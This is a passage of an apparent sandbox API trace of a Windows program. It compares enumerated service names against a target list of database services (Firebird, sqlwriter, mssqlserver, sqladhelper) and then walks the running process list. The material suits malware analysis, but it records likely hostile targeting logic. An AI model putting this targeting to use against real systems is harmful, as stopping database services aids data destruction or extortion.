lpString2="CryptSvc") returned 1 [0318.948] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0318.949] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0318.949] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0318.949] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0318.949] lstrlenW (lpString="DcomLaunch") returned 10 [0318.949] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0318.949] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0318.949] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0318.949] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0318.949] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0318.949] lstrlenW (lpString="DeviceAssociationService") returned 24 [0318.949] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0318.949] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0318.949] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0318.949] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0318.949] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0318.949] lstrlenW (lpString="Dhcp") returned 4 [0318.949] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0318.949] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0318.949] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0318.949] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0318.949] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0318.949] lstrlenW (lpString="Dnscache") returned 8 [0318.949] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0318.949] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0318.949] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0318.949] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0318.949] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0318.949] lstrlenW (lpString="DPS") returned 3 [0318.949] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0318.949] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0318.949] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0318.950] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0318.950] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0318.950] lstrlenW (lpString="DusmSvc") returned 7 [0318.950] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0318.950] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0318.950] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0318.950] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0318.950] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0318.950] lstrlenW (lpString="EventLog") returned 8 [0318.950] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0318.950] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0318.950] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0318.950] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0318.950] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0318.950] lstrlenW (lpString="EventSystem") returned 11 [0318.950] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0318.950] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0318.950] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0318.950] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0318.950] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0318.950] lstrlenW (lpString="FontCache") returned 9 [0318.950] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0318.950] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0318.950] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0318.950] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0318.950] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0318.950] lstrlenW (lpString="gpsvc") returned 5 [0318.950] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0318.950] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0318.950] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0318.951] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0318.951] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0318.951] lstrlenW (lpString="iphlpsvc") returned 8 [0318.951] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0318.951] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0318.951] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0318.951] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0318.951] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0318.951] lstrlenW (lpString="KeyIso") returned 6 [0318.951] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0318.951] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0318.951] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0318.951] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0318.951] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0318.951] lstrlenW (lpString="LanmanServer") returned 12 [0318.951] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0318.951] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0318.951] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0318.951] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0318.951] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0318.951] lstrlenW (lpString="LanmanWorkstation") returned 17 [0318.951] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0318.951] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0318.951] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0318.951] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0318.951] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0318.951] lstrlenW (lpString="lfsvc") returned 5 [0318.951] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0318.952] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0318.952] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0318.952] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0318.952] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0318.952] lstrlenW (lpString="lmhosts") returned 7 [0318.952] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0318.952] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0318.952] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0318.952] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0318.952] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0318.952] lstrlenW (lpString="LSM") returned 3 [0318.952] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0318.952] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0318.952] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0318.952] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0318.952] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0318.952] lstrlenW (lpString="MpsSvc") returned 6 [0318.952] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0318.952] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0318.952] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0318.952] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0318.952] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0318.952] lstrlenW (lpString="NcbService") returned 10 [0318.952] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0318.952] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0318.953] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0318.953] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0318.953] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0318.953] lstrlenW (lpString="netprofm") returned 8 [0318.953] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0318.953] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0318.953] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0318.953] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0318.953] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0318.953] lstrlenW (lpString="NgcSvc") returned 6 [0318.953] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0318.953] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0318.953] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0318.953] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0318.953] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0318.953] lstrlenW (lpString="NlaSvc") returned 6 [0318.953] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0318.953] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0318.953] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0318.953] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0318.953] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0318.954] lstrlenW (lpString="nsi") returned 3 [0318.954] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0318.954] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0318.954] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0318.954] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0318.954] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0318.954] lstrlenW (lpString="PcaSvc") returned 6 [0318.954] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0318.954] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0318.954] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0318.954] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0318.954] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0318.954] lstrlenW (lpString="PlugPlay") returned 8 [0318.954] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0318.954] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0318.954] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0318.954] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0318.954] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0318.954] lstrlenW (lpString="Power") returned 5 [0318.954] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0318.954] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0318.954] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0318.954] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0318.954] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0318.954] lstrlenW (lpString="ProfSvc") returned 7 [0318.954] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0318.955] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0318.955] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0318.955] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0318.955] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0318.955] lstrlenW (lpString="RpcEptMapper") returned 12 [0318.955] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0318.955] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0318.955] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0318.955] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0318.955] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0318.955] lstrlenW (lpString="RpcSs") returned 5 [0318.955] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0318.955] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0318.955] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0318.955] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0318.955] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0318.955] lstrlenW (lpString="SamSs") returned 5 [0318.955] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0318.955] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0318.955] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0318.955] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0318.955] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0318.955] lstrlenW (lpString="Schedule") returned 8 [0318.955] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0318.955] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0318.955] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0318.955] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0318.955] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0318.955] lstrlenW (lpString="SecurityHealthService") returned 21 [0318.955] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0318.956] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0318.956] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0318.956] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0318.956] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0318.956] lstrlenW (lpString="SENS") returned 4 [0318.956] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0318.956] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0318.956] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0318.956] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0318.956] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0318.956] lstrlenW (lpString="ShellHWDetection") returned 16 [0318.956] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0318.956] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0318.956] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0318.956] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0318.956] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0318.956] lstrlenW (lpString="Spooler") returned 7 [0318.956] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0318.956] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0318.956] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0318.956] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0318.956] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0318.956] lstrlenW (lpString="StateRepository") returned 15 [0318.956] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0318.956] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0318.956] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0318.956] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0318.956] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0318.956] lstrlenW (lpString="SysMain") returned 7 [0318.956] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0318.956] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0318.956] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0318.956] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0318.956] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0318.957] lstrlenW (lpString="SystemEventsBroker") returned 18 [0318.957] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0318.957] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0318.957] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0318.957] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0318.957] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0318.957] lstrlenW (lpString="Themes") returned 6 [0318.957] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0318.957] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0318.957] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0318.957] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0318.957] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41549e0 | out: hHeap=0x470000) returned 1 [0318.957] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x540 [0319.154] Process32FirstW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0319.154] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0319.155] lstrlenW (lpString="System") returned 6 [0319.155] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0319.155] lstrlenW (lpString="smss.exe") returned 8 [0319.155] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0319.156] lstrlenW (lpString="csrss.exe") returned 9 [0319.156] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0319.157] lstrlenW (lpString="wininit.exe") returned 11 [0319.157] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0319.157] lstrlenW (lpString="csrss.exe") returned 9 [0319.157] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0319.158] lstrlenW (lpString="winlogon.exe") returned 12 [0319.158] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0319.158] lstrlenW (lpString="services.exe") returned 12 [0319.158] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0319.159] lstrlenW (lpString="lsass.exe") returned 9 [0319.159] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0319.159] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0319.159] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0319.160] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0319.160] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.160] lstrlenW (lpString="svchost.exe") returned 11 [0319.160] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.161] lstrlenW (lpString="svchost.exe") returned 11 [0319.161] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0319.161] lstrlenW (lpString="dwm.exe") returned 7 [0319.162] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.162] lstrlenW (lpString="svchost.exe") returned 11 [0319.162] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.163] lstrlenW (lpString="svchost.exe") returned 11 [0319.163] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.163] lstrlenW (lpString="svchost.exe") returned 11 [0319.163] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x16c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.164] lstrlenW (lpString="svchost.exe") returned 11 [0319.164] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.164] lstrlenW (lpString="svchost.exe") returned 11 [0319.164] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.165] lstrlenW (lpString="svchost.exe") returned 11 [0319.165] Process32NextW (in: hSnapshot=0x540, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x52c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.165] lstrlenW (lpString="svchost.exe") returned 11 [0319.165] Process32NextW (in: hSnapshot=0x540, 